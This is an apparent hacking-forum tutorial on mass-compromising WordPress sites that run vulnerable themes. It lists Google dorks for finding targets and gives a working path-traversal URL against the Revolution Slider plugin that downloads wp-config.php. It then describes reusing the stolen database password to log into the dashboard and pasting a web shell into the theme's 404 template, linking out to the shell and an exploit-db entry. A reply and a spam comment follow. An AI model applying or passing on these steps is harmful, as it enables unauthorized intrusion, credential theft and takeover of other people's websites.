What's up bitchez!?
Today I thought I'd take some time and show you how EASY it is to hack multiple WordPress websites through some vulnerable themes.
Tutorial:
1.) Go to:
Quote:http://www.google.com
2.) Enter one of the dorks below and click search;
PHP Code:
"Index of" +/wp-content/themes/cuckootap/"Index of" +/wp-content/themes/IncredibleWP/"Index of" +/wp-content/themes/ultimatum"Index of" +/wp-content/themes/medicate/"Index of" +/wp-content/themes/Centum/"Index of" +/wp-content/themes/Avada/"Index of" +/wp-content/themes/striking_r/"Index of" +/wp-content/themes/beach_apollo/
Updated: 9/20/14
PHP Code:
inurl:wp-content/themes/jupiter
inurl:wp-content/themes/forall
inurl:wp-content/themes/x
inurl:wp-content/themes/celestial-lite
inurl:wp-content/themes/3clicks
EXAMPLE:
3.) Click on any website;
4.) Now just change the URL to:
PHP Code:
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
You will be prompt to download the admin.ajax.php.
Open with Notepad and click "OK"
5.) What just happen was you just downloaded the sites configuration file (Arbitrary File Download) where the default Administrator login details are stored.
6.) Now that you have the administrators login details let's try to login. Go to admin login page:
PHP Code:
www.target.com/admin/
orwww.target.com/wp-login.php
EDIT:
When you enter the username and password. Most of the time the username will always be: admin but the password is the default password for the MySQL database. Sometimes the admin will use the same password as the MySQL password to login to the WordPress Dashboard, if not move on to the next vulnerable wordpress site and repeat the steps above until you find one that gives you access to the dashboard.
7.) Once you gain access to the dashboard you will be able to upload your shell to the site by clicking on "Appearance" then "Editor".
8.) On the left under Templates click on 404 template (404.php)
9.) Next paste your shell code and click "Upload File"
NOTE: if you do not have a shell you can find the one used in this tut here:
Quote:http://pastebin.com/cuWAmsUE
10.) Enter URL below to access your shell.
PHP Code:
www.target/wp-content/themes/THEME NAME /404.php
Not Working? Try this:
Quote:http://www.hackforums.net/showthread.php?tid=2312449
These are public exploits and can be found @:
Quote:http://www.exploit-db.com/exploits/34511/
Happy Hacking! And thanks for viewing my thread.
PoC from: Ao Haru Ride
(09-15-2014 06:55 AM)Ao Haru Ride Wrote: ►Hi mate I got one. Im happy now
Thanks :)
"That is really interesting, You are an excessively professional
ReplyDeleteblogger. I have joined your rss feed and stay up for in the
hunt for extra of your excellent post.
Take a look at my weblog :: Technology Bank | D-Hacking Blog"